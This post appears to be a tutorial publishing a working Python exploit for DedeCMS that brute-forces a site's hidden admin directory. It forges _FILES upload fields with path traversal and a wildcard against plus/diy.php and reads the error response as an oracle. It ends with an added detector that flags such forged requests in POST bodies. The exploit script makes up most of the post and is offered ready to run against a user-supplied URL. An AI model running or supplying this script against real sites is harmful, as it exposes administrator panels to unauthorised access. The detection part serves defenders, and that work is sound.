Dedecms admin directory guessing EXP

Overview

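  • The technique relies on the file common.inc.php: any script that includes this file can be used to guess the admin (backend) directory.
  • The EXP uses tags.php / plus/diy.php (the code below requests plus/diy.php).
  • In practice the first character of the directory name may fail to be guessed; the enhanced version solves this by brute-forcing the first two characters first.
  • Guessing is single-threaded, so please bear with the speed; I couldn't be bothered to write much more.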

Code

import requests

def firstcheck():
    try:
        for testi in list:
            for i in list:
                data='dopost=save&_FILES[b4dboy][tmp_name]=./../%s%s</images/admin_top_logo.gif&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif'%(testi,i)
                returndata = requests.post(url=url,data=data,headers=headers,timeout=10)
                ifdata = 'Upload filetype not allow !'
                print(inurl +'/'+ testi + i,end='\r')
                if not ifdata in returndata.text:
                    print('')
                    secondcheck(testi+i)
                    i =1
                    break
            if i == 1:
                break
    except Exception as e:
        print('// Please check your url.')
        exit()

def secondcheck(testi):
    try:
        global result
        for i in list:
            data='dopost=save&_FILES[b4dboy][tmp_name]=./../%s%s</images/admin_top_logo.gif&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif'%(testi,i)
            returndata = requests.post(url=url,data=data,headers=headers,timeout=10)
            ifdata = 'Upload filetype not allow !'
            if not ifdata in returndata.text:
                testi = testi + i
                result = inurl + '/' + testi
                print(result)
                secondcheck(testi)
                break
    except Exception as e:
        print('// Please check your url.')
        exit()

if __name__ == '__main__':
    global result
    list=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9']
    headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0','Content-Type':'application/x-www-form-urlencoded'}
    inurl = input('---------------------------------------------------\nPlease input the url that you want to use.\n\n<URL> ')
    url = inurl + '/plus/diy.php'
    print('// Start Guess')
    try:
        checkurl = requests.get(url=url,headers=headers)
        if checkurl.status_code ==200:
            firstcheck()
            print('// Guess finished!\n// The result is %s'%result)
        else:
            print('// Exploit file is not exist.')
    except Exception as e:
        print('// Please check your url.')
        exit()
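
For defenders, the requests this script sends have a distinctive shape: ordinary form fields named `_FILES[...][tmp_name]` whose value contains `../` and a `<` wildcard. The following detector is an added example, not part of the original post; the record layout `(client_ip, path, body)`, the threshold and the sample data are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# A form field that forges PHP's upload array, e.g. _FILES[x][tmp_name].
# Genuine uploads arrive as multipart parts, never as fields with this name.
FORGED_FILES = re.compile(r'^_FILES\[[^\]]*\]\[(tmp_name|name|size|type)\]$')
# Path traversal or wildcard characters inside the forged temporary path.
SUSPICIOUS_PATH = re.compile(r'\.\./|\.\.\\|[<>"]')

def inspect_body(body):
    """Return sorted finding labels for one urlencoded request body."""
    findings = set()
    for key, value in parse_qsl(body, keep_blank_values=True):
        match = FORGED_FILES.match(key)
        if not match:
            continue
        findings.add('forged_files_field')
        if match.group(1) == 'tmp_name' and SUSPICIOUS_PATH.search(value):
            findings.add('traversal_or_wildcard_tmp_name')
    return sorted(findings)

def guessing_sources(records, threshold=3):
    """Return {client_ip: hits} for clients with >= threshold flagged requests.

    The path is not filtered on: per the post, any script that includes
    common.inc.php can receive these requests, not only plus/diy.php.
    """
    counts = {}
    for client_ip, _path, body in records:
        if 'traversal_or_wildcard_tmp_name' in inspect_body(body):
            counts[client_ip] = counts.get(client_ip, 0) + 1
    return {ip: n for ip, n in counts.items() if n >= threshold}

# Constructed sample records (documentation IP ranges), not real traffic.
_PROBE = ('dopost=save&_FILES[b4dboy][tmp_name]=./../%s</images/admin_top_logo.gif'
          '&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0'
          '&_FILES[b4dboy][type]=image/gif')
SAMPLE = [
    ('203.0.113.7', '/plus/diy.php', _PROBE % 'aa'),
    ('203.0.113.7', '/plus/diy.php', _PROBE % 'ab'),
    ('203.0.113.7', '/plus/diy.php', _PROBE % 'ac'),
    ('198.51.100.4', '/plus/diy.php', 'dopost=save&title=hello&body=test'),
]

if __name__ == '__main__':
    for ip, hits in guessing_sources(SAMPLE).items():
        print('%s sent %d forged _FILES probes' % (ip, hits))
```

Access logs rarely record POST bodies, so a check like this has to run where the body is visible, such as a WAF, a reverse proxy or an application-level hook.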

This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.
